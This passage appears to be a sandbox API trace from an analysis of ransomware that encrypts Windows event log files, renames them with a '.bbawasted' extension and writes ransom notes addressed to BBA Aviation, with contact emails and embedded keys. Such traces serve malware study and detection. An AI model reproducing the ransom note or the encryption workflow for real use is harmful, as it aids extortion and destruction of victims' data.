RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.096] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a64e8) returned 1 [0196.096] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0196.096] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0196.096] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0196.097] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0196.157] SetEndOfFile (hFile=0x28c) returned 1 [0196.157] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.157] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0196.157] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.bbawasted")) returned 1 [0196.158] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0196.159] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0196.159] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0196.159] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0196.159] CloseHandle (hObject=0x280) returned 1 [0196.172] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0196.173] CloseHandle (hObject=0x294) returned 1 [0196.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0196.173] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0196.174] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0196.174] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0196.174] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0196.174] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0196.174] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0196.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0196.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0196.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.185] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RWyhUp7yflDj77XfKh+ZeiWgq+SlOvILuMHcFFAkxxkH0uOEThTm8z0kvxBpS0Xh\r\niaaX611D/Da405OxE0Q7/P6SaH5gQWJoCcaZdTqUEXphjzPhBl+adIhS9fQNdv4r\r\nVj9YO20Toe7GPpa2EbZPmSb3qLtFQ3vXxTSic3hSxBnjckvrmWNtpF6Kk1c8c+DU\r\nM84f4J2VQFNLzo0gR9qiO4nfNZc/NYOnYlwJF93GPwrdqi9OjNGeZmF/Hc30Skzp\r\nBplE6cow4quBscEAo0kIMcaJ7RKC2NghxtT7InfymADEcqmN4c3OnyFHf68ECViZ\r\ndZd7cLaU7JoG8hveS271CPvCE7/peO0ZJF6BwHb2MU0ct1c/U/0BIbGGzHSrBXsc\r\n/56QLguX17JvbPwVe8S2XmlAap7uPxKdjezNhu51Z5nAtFaRjoOMLW0eLixKavGK\r\n3B1mrcPCz1z7DLHDKTVuLf9uEATLcBMTwQFgwkK70rN+JIY4JTmMZPp/8UyQOYBO\r\ntXlcmLnt+gh9a3wkdbeu3yiBykqjc6I6xXLm0jMlj33UclXQnp96n+eiNWUtMzdO\r\nw/4iQTJrgqrkAXEaT7t/ZE0R+9qmDKOnbVrF7xEYZ5hxsoZ6JWndc+Uis40iUO+l\r\nj9jQqhv6vbs2/pofRWDbShSY1Q7K98jS1h3siMTTYnb=[end_key]\r\nKEEP IT\r\n") returned 984 [0196.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0196.186] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0196.186] SetEndOfFile (hFile=0x28c) returned 1 [0196.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.189] CloseHandle (hObject=0x28c) returned 1 [0196.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0196.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f100 | out: hHeap=0x660000) returned 1 [0196.197] _aulldvrm () returned 0x0 [0196.197] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0196.198] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0196.198] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0196.198] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 59 [0196.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0196.198] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0196.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.198] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0196.199] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0196.199] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0196.199] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0196.258] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0196.259] SetEndOfFile (hFile=0x28c) returned 1 [0196.259] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.260] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0196.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.bbawasted")) returned 1 [0196.261] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0196.261] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0196.261] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0196.261] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0196.261] CloseHandle (hObject=0x294) returned 1 [0196.287] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0196.289] CloseHandle (hObject=0x280) returned 1 [0196.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0196.290] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6b48) returned 1 [0196.293] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0196.293] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0196.293] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0196.294] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0196.294] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0196.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0196.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0196.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.349] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jGdobXKHmcR5eujvxBTZyJ/uXxdFnGhqAlJlsOirZ2NUNgiFJzMj47/Urh3OMtJN\r\nq6A7nFyNg2AlUQT/Rs7LKewuHQ9AwB3WZ2Jlg60FqUyX8JLUux2XGQNqLLRIJLfA\r\nYWlpMF/P+C7/TVgcF3QSlOCsLxkS0S8a9CJBXd3vKvkn9vcCVbRO2Uudw9UL8fXs\r\nlVopyLTtNzPlZhxXipNzk9gOfHKA6nmiNU2IU84VVjWXrCWf0al8hTsG6selkSo6\r\ngCCz4Hbl7Vv7wj/EqLrAN9xt7rzYCNff5JOkn4S31wiHw1O0GGQtt8q5nHiREx21\r\nelGsUBtAO9wTFgLTFy0IYCHeTd/divT/SnciFkCJHEOnSAegWx3vsv0YPYHsr3m2\r\nkk+mIjMFned5rnfA6H8n4hcscpxWsuJ7dEip7wRLwSHE/CksdJsY5R8Mk5DCBAon\r\nisN8qgzPKgK92O0FdrXsr63blMFpkoDh0GOwu0tyD4Yk1IGk50ZgS1WM0ziUqDH/\r\nn0c7oKXuVwbvOPvi4L/g+Uhsp8l3Lg9GA+Z04BjKbU3XE0pf4wxyUE2/NuowovO4\r\neWqYjwvAfWq4h6D2IbrX+Fo+pk+rgZNDy0PV9Rz8FbNZw5vxknEnST4k2dPytGDK\r\n6Hy+2Z8JB8geSPaBnehUaF5Iats/5NNY4J7jmP6Xjhi=[end_key]\r\nKEEP IT\r\n") returned 984 [0196.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0196.349] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0196.350] SetEndOfFile (hFile=0x28c) returned 1 [0196.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.353] CloseHandle (hObject=0x28c) returned 1 [0196.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0196.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f1d0 | out: hHeap=0x660000) returned 1 [0196.356] _aulldvrm () returned 0x0 [0196.356] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0196.357] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0196.357] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0196.357] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 58 [0196.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27e) returned 0x6aecf0 [0196.357] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0196.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.358] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a64e8) returned 1 [0196.358] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0196.358] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0196.358] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0196.360] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0196.362] SetEndOfFile (hFile=0x28c) returned 1 [0196.363] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.363] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0196.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.bbawasted")) returned 1 [0196.364] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0196.364] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0196.365] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0196.365] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0196.365] CloseHandle (hObject=0x280) returned 1 [0196.374] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0196.374] CloseHandle (hObject=0x294) returned 1 [0196.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0196.375] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6818) returned 1 [0196.375] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0196.375] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0196.375] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6708) returned 1 [0196.376] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0196.376] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0196.500] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0196.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0196.500] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.500] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]oFTbzrAi58kic37ZozL36FTK5CQPv74mN2iyU68eas7rbyxkd8iqM7yKRtnpJMJJ\r\n03uRCA3YvVInkcaXR+ztnf18+lCXKWNwNi9dJ5NnDWVP9nojz8w2/+ZkvgFh8oDJ\r\nIq36IeOjuWfltUy9/1uCVSoiQ6Qf+HvOh/PYhv4uqFwFnRldxVISAiFKvq1EdEgx\r\nvTiV9fuLe5+fNXDWwXfjQfQEnZ5vhCsFJbs2D7xFqKQObCXaYJNYQWSQdX2eXb4a\r\nlQ6ZYwgj+1JR7bDDXCKkxdzXd3Fn0GYPTnRuax9y2jifPiScGS92+CtecGZFpt/X\r\n00MKXHPJHPIWo3Ipypk6DUY0l943GO/FmOKOyYNdbUGS1ykL5NeQ83zXXvXdX4kb\r\nRnM1p3PY42MnFvU388rOTmb8gBCT1eW3wIaSANNJtcrDIeIqVeLxbIB/lCmFEzMh\r\nnnvG3nuce1VXabcxtPjoU9JxnHK7phCjcavjYB201L5RbxC7/FTn6g4iKkHqmCWk\r\nOEmCEsB/qMfJeDli3Avj9n/Zy8VwuAoyqYolgaXnzCfQV0lJmyTGry+Nk8u/ayss\r\nyisap4BzejjQiL/XapIbbZpsmMaJba2O4RNElowiMouv4nVIJ0K8RX+CEWMJqhep\r\nvLQOJA/MaYkRyQgUOdKaE+zLSZ/ypafY/GG/vqVmTXF=[end_key]\r\nKEEP IT\r\n") returned 984 [0196.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0196.500] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0196.501] SetEndOfFile (hFile=0x28c) returned 1 [0196.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.504] CloseHandle (hObject=0x28c) returned 1 [0196.509] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0196.510] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f2a0 | out: hHeap=0x660000) returned 1 [0196.510] _aulldvrm () returned 0x0 [0196.510] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0196.511] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0196.511] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0196.511] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 58 [0196.511] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27e) returned 0x6aecf0 [0196.511] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0196.511] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.511] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6680) returned 1 [0196.512] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0196.512] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0196.512] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0196.513] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0196.516] SetEndOfFile (hFile=0x28c) returned 1 [0196.516] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.516] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.516] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0196.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.bbawasted")) returned 1 [0196.517] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0196.517] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0196.517] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0196.518] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0196.518] CloseHandle (hObject=0x294) returned 1 [0196.526] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0196.526] CloseHandle (hObject=0x280) returned 1 